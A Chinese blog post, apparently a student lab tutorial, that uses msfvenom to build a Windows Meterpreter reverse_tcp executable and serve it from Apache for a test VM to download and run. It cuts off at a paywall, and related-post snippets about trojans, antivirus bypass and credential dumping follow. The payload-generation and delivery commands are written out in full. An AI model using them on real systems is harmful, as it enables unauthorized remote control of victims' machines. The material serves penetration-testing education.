如何使用msfvenom生成被控端并进行远程控制

已于 2023-06-28 16:23:30 修改
阅读量400 收藏 4
点赞数 2
文章标签: 安全 web安全
于 2023-06-26 23:36:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hotumn/article/details/131367299
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

如何使用msfvenom生成被控端并进行远程控制

在Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)

前言

Kali Linux2中提供了一个名为MSFPC(MSFvenom Payload Creator)的工具,它其实是MSFvenom的优化版,使用起来更简单,利用这个工具就可以轻松地生成各种系统的远程控制被控端。

一、前导练习:

  1. 查看帮助信息
    命令:msfvenom --help
    下面给出了msfvenom的几个常见的使用参数。
    Options:
    -p, --payload 指定要生成的payload( 攻击荷载)。如果需要使用自定义的payload,请使用’-‘或者stdin指定
    -f, --format 指定输出格式(可以使用 --help-formats 来获取msf支持的输出格式列表)
    -o, --out 指定存储payload的位置
    –payload-options 列举payload的标准选项
    –help-formats 查看msf支持的输出格式列表
    在这里插入图片描述
  2. 查看所有可以使用的攻击模块
    命令:msfvenom -l payloads在这里插入图片描述
  3. 筛选出使用reverse_tcp的模块
    命令:msfvenom -l payloads | grep reverse_tcp在这里插入图片描述
  4. 使用–list-options选项查看攻击载荷需要设置的参数
    命令:msfvenom --list-options -p 【使用reverse_tcp的模块】
    在这里插入图片描述

二、6.4 如何使用msfvenom生成被控端并进行远程控制

(一)6.4.1 生成windows系统下的被控端并进行远程控制

测试windows系统实验使用的网络环境,填写以下IP地址:
测试用windows系统(WinXPenSP)的IP: 192.168.163.132
在这里插入图片描述
虚拟机Kali Linux 2的IP: 192.168.163.130
在这里插入图片描述

步骤一:生成Windows操作系统下的被控端并放入目标靶机运行

options(选项)
-p 指定要生成的攻击荷载(payload)
-f 输出格式(format)
-o 输出(out)存储payload的位置
方法一(教材): 将被控端payload.exe生成到/var/payload.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.163.130 lport=5000 -f exe -o /var/pavload.exe

在这里插入图片描述
方法二:将被控端winpayload.exe生成到网站的目录(/var/www/html/)下,然后到靶机中用浏览器下载并运行。
(1)将被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)下

ls /var
cp /var/payload.exe /var/www/html/winpayload.exe
ls /var/www/html

在这里插入图片描述
(2)检查apache2服务是否启动:systemctl status apache2.service
在这里插入图片描述
(3)启动apache2服务systemctl start apache2.service
在这里插入图片描述
(4)到靶机WinXPenSP3中用浏览器下载并运行
在这里插入图片描述

步骤二 :启

最低0.47元/天 解锁文章
21级计算机网络技术1班 钟秋榕
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
使用msfvenom生成被控进行远程控制
2301_78429157的博客
06-29 486
传送payload生成payload文件(payload.exe)传送到目标机器上。在网络安全领域中,远程控制是一项常见的技术,它允许安全专业人员模拟攻击并评估系统的安全性。远程控制 一旦连接建立成功,你将获得一个Meterpreter Shell,可以在目标机器上执行各种操作和命令。执行payload 在目标机器上执行payload文件。一旦执行成功,它将尝试连接本地机器上的Metasploit监听器。生成payload 首先,我们需要使用msfvenom生成恶意的payload
使用msfvenom远程控制
最新发布
m0_68638628的博客
06-29 959
msfvenom是msfpayload,msfencode集成的一个免费的、可下载的框架工具。它的优点是一个单一的工具、标准化的命令行选项、效率高,其免杀效果也不错。⑵再被控改名为winpayload.exe复制到网站的目录(/var/www/html/)将被控linuxpayload.elf生成到网站的目录(/var/www/html/)下。将被控winpayload.exe生成到网站的目录(/var/www/html/)下。⑴将被控payload.exe生成到/var/payload.exe
使用MSFPC远程控制
y3174445239的博客
06-24 559
切换为root用户之后,可以对安卓机进行最大权限的控制,比如关闭selinux、读取文件等。按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。Netcat工具的使用:(以Metasploitable 2的80口为例进行测试)2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。(2)在安卓虚拟机中弹出提示信息,选择“允许”。
Metasploit search参数
luminous_you的博客
09-24 537
msfvenom 参数: -q快速启动msf,不显示banner信息; -x加载模块代码 -p, –payload < payload> 指定需要使用payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –fo
攻击篇--远程控制(一)生成被控与主控
qq_40424448的博客
06-03 4555
笑脸漏洞与6200 如果目标主机被使用笑脸漏洞成功渗透,那么会自动在6200口打开一个连接,可以实现攻击者对目标主机的控制。这是一个很经典的案例,如果将这个连接比作是正好能让一个人爬行通过,那么接下来的远程控制篇就是如何将这个缺口变大,大的卡车都可以自由出入。而这个大的入口,就是我们平常所说的远程控制。 netcat ......
使用Python进行防病毒免杀解析
12-23
接着,我们使用msfvenom生成Python Meterpreter payload。Meterpreter是一种强大的远程控制工具,允许渗透测试者在目标系统上执行各种操作。在命令行中输入`msfvenom`命令,指定payload类型、回连主机和口,以及...
E041-服务漏洞利用及加固-利用CVE-2018-4878漏洞上传实现远程控制.pdf
12-02
然后,利用`msfvenom`工具生成一个针对Windows的Meterpreter反向TCP shell payload,指定Kali的IP地址(lhost)和自定义口号(lport),并将生成的Python代码保存为`shellcode`文件。 在`CVE-2018-4878.py`文件中...
trolo:trolo-一个易于使用的脚本,用于生成绕过防病毒软件的有效负载
01-31
反向shell允许攻击者从目标机器上获取一个命令行界面,使得他们可以从远程位置控制受害者的设备。这种类型的攻击常见于 APT(高级持续性威胁)和网络间谍活动中。 "bypass-av" 和 "bypassantivirus" 指的是 trolo ...
AutoXploit:基于metasploit的快速利用
02-05
用户可以使用msfvenom生成不同平台和类型的payload,例如Windows、Linux或者Android,同时还可以设置反向连接、反弹shell等选项。 "ubuntu-scripts"标签可能意味着AutoXploit在Ubuntu操作系统上运行良好,或者包含...
Metasploit可执行后门.doc
12-01
这个命令将生成一个名为https.exe的可执行文件,该文件可以连接到远程服务器,并提供了反向shell访问的功能。 3. Metasploit可执行后门的使用 Metasploit可执行后门可以用于各种攻击场景,例如: * 渗透测试:...
第九十四课:基于实战中的small payload.docx
09-15
在示例中,我们看到使用`msfvenom`命令生成了基于Windows的Meterpreter payload,该payload通过TCP进行反向连接,LHOST设置为攻击机的IP(192.168.1.5),LPORT为53口。生成的原始payload大小约为72KB,这在某些...
网络安全-渗透完整笔记
03-27
同时,利用各种下载工具如vbs、certutil、ftp、bitsadmin等生成和传输payload,实现远程控制。 在内网渗透中,文件传输是关键,可能涉及通过Powershell建立Socks 4-5代理,或者与Smbmap等工具结合进行攻击。高级...
【技术分享】恶意框架样本分析-从Veil到Msf .pdf
09-05
在上一篇文章中,我们了解到如何使用Veil生成C/meterpreter类型的payload,并对其进行了初步分析。Meterpreter是一种强大的后渗透阶段的远程shell,它允许攻击者在目标系统上执行多种操作,如文件管理、进程控制、...
ertutil一句话下载payload补充(第四十四课).docx
09-15
整个流程展示了攻击者如何巧妙地利用合法工具(如`certutil`和Powershell)以及混淆技术来规避安全检测,实现远程控制目标机器的目的。这种技术在实际的网络安全对抗中非常重要,同时,对于防御者来说,了解这些攻击...
msf后渗透之获取登入password、远程控制、调用摄像头
m0_61506558的博客
09-02 2358
在terminal输入load kili creds_all直接获取密码(不一定成功) 使用kiwi_cmd sekurlsa::logonpasswords获取密码
Metasploit Framework渗透测试框架基础入门到进阶实战
02-15
一、课程概要      本课程主要分享Metasploit Framework渗透测试框架基础入门到进阶实战教程!二、适合人员      1、零基础大学生      2、IT技术人员      3、运维工程师      4、渗透测试工程师三、特别说明      1、本课程支持一次购买,永久观看!      2、本课程支持一次购买,永久更新!      
msfconsole 控制台使用和操作
热门推荐
xianjie0318的博客
08-07 2万+
Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终之后,可以首先输入help命令列出MSF终所支持的命令列表,包括核心命令集和后数据库命令集。对于...
记kali下使用metasploit木马进行远程控制
m0_46371267的博客
05-11 1079
环境:ubuntun+kali2020.4 本次实验需要两台虚拟机kali及ubuntun 注:kali地址为192.168.147.137 ubuntun的地址为192.168.147.129 本人使用ssh链接 ssh链接ubuntun 并进入root权限 ssh链接kali 在kali下root权限下生成payload(也就是木马) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.147.137 LPORT=4444 -
msfvenom 生成windows的exe木马
06-02
生成Windows的exe木马,可以使用msfvenom命令,如下所示: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > payload.exe ``` 其中,`windows/meterpreter/reverse_tcp`是使用Meterpreter反向TCP连接的payload。`LHOST`是攻击者的IP地址,`LPORT`是攻击者监听的口号。`-f exe`指定输出为exe文件,`> payload.exe`将输出重定向到一个名为payload.exe的文件中。 在生成exe文件中包含了一个Meterpreter shell,可以用于远程控制目标系统。请注意,使用这种工具进行攻击是非法的,仅用于测试和教育目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值